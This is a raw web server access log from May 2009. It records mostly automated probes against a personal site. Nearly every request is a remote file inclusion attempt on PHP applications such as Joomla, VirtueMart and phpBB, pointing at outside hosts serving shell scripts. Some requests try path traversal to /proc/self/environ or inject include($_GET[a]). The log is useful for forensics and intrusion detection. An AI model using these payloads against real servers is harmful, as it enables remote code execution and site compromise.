88.191.103.144 - - [19/May/2009:09:28:51 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:28:55 -0700] "GET /logs/access_080619.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:28:55 -0700] "GET /logs/access_080925.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:28:56 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:28:57 -0700] "GET /logs/access_090405.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:28:57 -0700] "GET /components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:29:15 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:29:16 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:29:16 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:29:16 -0700] "GET /logs/access_080714.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:29:28 -0700] "GET /logs/access.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:29:34 -0700] "GET /logs/access_080222.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:29:34 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [19/May/2009:09:29:38 -0700] "GET //vwar/backup/errors.php?error=http://www.mambi.it//components/com_poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:29:43 -0700] "GET /logs/access_080414.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:29:50 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:29:55 -0700] "GET /logs/access_090407.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:29:57 -0700] "GET /logs/access_090407.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:29:57 -0700] "GET /logs/access_090506.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:29:59 -0700] "GET /logs/access_090506.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:30:04 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:09:30:23 -0700] "GET /?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 42057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:09:30:23 -0700] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 100196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:30:24 -0700] "GET /logs/access_090407.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:30:28 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 200 42004 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:30:29 -0700] "GET /logs/access_080222.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:30:33 -0700] "GET /logs/access_080414.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:30:33 -0700] "GET /logs/access_080619.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:30:34 -0700] "GET /logs/access_080925.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:30:42 -0700] "GET /logs/access_090506.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:30:47 -0700] "GET /logs/access_090407.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:30:59 -0700] "GET /logs/access_090506.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:31:09 -0700] "GET /logs/access_080803.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:31:51 -0700] "GET /logs/access_071214.log%20%20//?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:31:56 -0700] "GET /logs/access_090502.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:32:00 -0700] "GET /logs/access_080619.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:32:00 -0700] "GET /logs/access_080925.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:32:05 -0700] "GET /logs/access_080226.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:32:12 -0700] "GET /logs/access_090405.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:32:21 -0700] "GET /logs/access_090507.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:32:24 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:32:42 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:32:42 -0700] "GET /include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:32:42 -0700] "GET /logs/access_081204.log//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:32:47 -0700] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:32:49 -0700] "GET /logs/access_080418.log%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:32:49 -0700] "GET /logs/access_080921.log%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:32:52 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:32:52 -0700] "GET /logs/access_080619.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:32:57 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:33:00 -0700] "GET /logs/access_090210.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:33:17 -0700] "GET /logs/access_081204.log//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:33:17 -0700] "GET /include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:33:17 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:33:17 -0700] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:33:38 -0700] "GET /logs/access_090405.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:33:44 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:33:45 -0700] "GET //skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:33:45 -0700] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:33:45 -0700] "GET /logs/access_071214.log///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:33:45 -0700] "GET /logs/access_080331.log///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.249.36.194 - - [19/May/2009:09:33:56 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 200 7988 "-" "libwww-perl/5.79" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:33:56 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:33:56 -0700] "GET /logs/access_081017.log%20%20//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:33:56 -0700] "GET /include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:00 -0700] "GET /logs/access_080902.log//include/main.php?config[search_disp]=true&include_dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:00 -0700] "GET /logs/access_080902.log//include/main.php?config[search_disp]=true&include_dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:01 -0700] "GET /include/main.php?config[search_disp]=true&include_dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:09:34:01 -0700] "GET /logs/access_080801.log%20%20//include/admin.lib.inc.php?site_path=http://user.mw.lt/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:01 -0700] "GET /include/main.php?config[search_disp]=true&include_dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:02 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:02 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:09 -0700] "GET /logs/access_081116.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.187.131.185 - - [19/May/2009:09:34:36 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.187.131.185 - - [19/May/2009:09:34:36 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.187.131.185 - - [19/May/2009:09:34:36 -0700] "GET /logs/access_090311.log/skin/zero_vote/ask_password.php?dir=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:09:34:40 -0700] "GET /logs/access_080925.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:09:34:40 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:09:34:40 -0700] "GET /logs/access_080619.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:09:34:40 -0700] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.187.131.185 - - [19/May/2009:09:34:40 -0700] "GET /logs/access_081204.log/skin/zero_vote/ask_password.php?dir=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:34:48 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:35:12 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:35:18 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:35:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:35:37 -0700] "GET /logs/access_071214.log%20%20//?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:35:42 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:35:47 -0700] "GET /logs/access_080730.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:36:00 -0700] "GET /components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:36:00 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:36:00 -0700] "GET /logs/access_090502.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:36:00 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 500 292 "-" "libwww-perl/5.826" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:36:17 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:36:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:36:38 -0700] "GET /logs/access_080425.log%20%20//?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:36:47 -0700] "GET /components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:36:47 -0700] "GET /logs/access_090502.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:36:47 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:36:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:36:57 -0700] "GET /logs/access_090403.log%20%20//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:36:57 -0700] "GET /songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:36:57 -0700] "GET /logs//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:37:07 -0700] "GET /logs/access_081114.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:37:10 -0700] "GET /includes/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:37:10 -0700] "GET /logs/access_081007.log//includes/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:37:11 -0700] "GET /logs//includes/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:37:12 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 200 41935 "-" "libwww-perl/5.826" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:09:37:34 -0700] "GET /?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 42057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:09:37:35 -0700] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 100196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:37:44 -0700] "GET /logs/access_090405.log%20%20//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:38:05 -0700] "GET /logs/access_090507.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:38:26 -0700] "GET /logs/access_080422.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.130.178 - - [19/May/2009:09:38:27 -0700] "GET /logs/access_080714.log//main.php?page=http://www.graal-plus.zp.ua//images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.130.178 - - [19/May/2009:09:38:29 -0700] "GET /main.php?page=http://www.graal-plus.zp.ua//images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.130.178 - - [19/May/2009:09:38:29 -0700] "GET /logs//main.php?page=http://www.graal-plus.zp.ua//images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
